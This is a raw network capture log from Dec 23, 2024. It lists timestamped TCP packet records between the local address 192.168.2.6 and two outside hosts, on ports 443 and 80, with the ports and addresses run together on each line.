                                                                                                        Dec 23, 2024 08:39:34.749547958 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.749568939 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.788188934 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.788216114 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.788280964 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.788295984 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.788350105 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.794002056 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.794025898 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.794074059 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.794080973 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.794130087 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.799911976 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.799932003 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.799990892 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.799998045 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.800024033 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.800043106 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.805130959 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.805155993 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.805212975 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.805212975 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.805222988 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.805260897 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.805274963 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.811388969 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.811408997 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.811463118 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.811470985 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.811507940 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.811516047 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.816656113 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.816673040 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.816720963 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.816728115 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.816766977 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.822518110 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.822532892 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.822592020 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.822598934 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.822642088 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.941725969 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.941752911 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.941837072 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.941865921 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.941886902 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.941905975 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.980391979 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.980418921 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.980474949 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.980484962 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.980535030 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.986308098 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.986326933 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.986375093 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.986383915 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.986428976 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.986443043 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.992203951 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.992221117 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.992270947 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.992280006 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.992316008 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.992330074 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.997596025 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.997618914 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.997672081 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.997684956 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.997714043 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.997728109 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:35.003634930 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:35.003652096 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:35.003710985 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:35.003737926 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:35.003786087 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:35.008826017 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:35.008848906 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:35.008889914 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:35.008898020 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:35.008932114 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:35.008944988 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:35.014830112 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:35.014856100 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:35.014902115 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:35.014908075 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:35.014945984 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:35.014966965 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:35.015650034 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:35.015705109 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:35.015710115 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:35.015727997 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:35.015789032 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:35.016124964 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:38.630172968 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:38.750063896 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:38.750253916 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:38.768599987 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:38.888101101 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.260401011 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.260421038 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.260436058 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.260481119 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:40.260497093 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.260543108 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:40.260548115 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.260561943 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.260575056 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.260588884 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.260601997 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:40.260629892 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:40.260896921 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.260910034 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.260970116 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:40.380261898 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.380330086 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.380390882 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:40.452297926 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.474129915 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.474214077 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:40.474351883 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.478384972 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.478405952 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.478446960 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:40.486860037 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.486922979 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:40.486941099 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.495157957 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.495203972 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:40.495275974 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.503526926 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.503581047 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:40.503639936 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.512022972 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.512101889 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:40.512120962 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.520327091 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.520467043 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.520481110 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:40.528626919 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.528682947 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:40.528772116 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.537089109 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.537139893 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.537146091 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:40.545450926 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.545562029 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.545615911 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:40.594037056 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.594055891 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.594099998 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:40.597944975 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.598023891 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:40.717565060 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.717582941 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.717648983 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:40.733894110 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.817493916 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:40.832918882 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.832937002 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.832995892 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:40.837054014 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.856630087 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.856847048 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:40.937045097 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.937143087 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.937160969 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.937176943 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.937195063 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.937208891 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:40.937211037 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.937227964 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.937243938 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.937259912 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:40.937262058 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.937278032 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.937298059 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.937304974 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:40.937330008 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:40.937482119 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.937500000 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.937534094 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:40.937541008 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.937556028 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.937582016 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.937598944 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.937601089 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:40.937624931 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:40.937638044 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.937657118 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.937675953 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.937681913 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:40.937694073 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.937710047 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.937738895 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:40.937763929 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:40.938374043 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.938401937 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.938417912 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.938436985 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.938462019 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:40.938488960 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:40.938545942 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.938563108 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.938576937 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.938602924 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:40.938709974 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.938786030 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:40.939275980 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.939292908 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.939310074 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.939344883 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.939362049 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.939368010 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:40.939409018 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:40.939589024 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.939604044 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.940277100 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:40.941375971 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.941430092 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:40.941523075 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.945373058 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.945436954 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:40.945739031 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.949311018 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.949404001 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:40.949472904 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.953353882 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.953372002 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.953409910 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:40.957159042 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.957211971 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:40.957267046 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.961132050 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.961183071 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:40.961292982 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.976953030 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.977020979 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:40.977097988 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.978986979 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:40.979041100 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:40.979156017 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.057848930 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.057917118 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.058027029 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.059175014 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.059221029 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.059303999 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.063143015 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.063159943 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.063215971 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.067081928 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.067234039 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.067282915 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.071120977 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.071171999 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.071234941 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.074994087 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.075041056 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.075074911 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.078917980 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.078977108 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.079039097 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.082833052 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.082953930 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.082967043 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.086719036 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.086775064 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.086815119 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.090549946 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.090616941 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.090643883 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.094336033 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.094466925 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.094666004 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.098170042 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.098189116 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.098227978 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.101902962 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.101994991 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.102015018 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.105756044 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.105892897 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.105994940 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.109632015 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.109651089 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.109718084 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.115587950 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.115650892 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.115689039 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.117438078 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.117492914 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.117513895 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.120212078 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.120286942 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.120318890 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.124080896 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.124207020 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.124274969 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.127736092 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.127867937 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.127906084 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.131619930 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.131681919 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.131746054 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.135323048 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.135390997 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.135396004 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.139096975 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.139251947 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.139302969 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.142931938 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.142957926 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.142991066 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.146652937 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.146733046 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.146752119 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.150441885 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.150547981 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.150547981 CET4978380192.168.2.6139.99.188.124
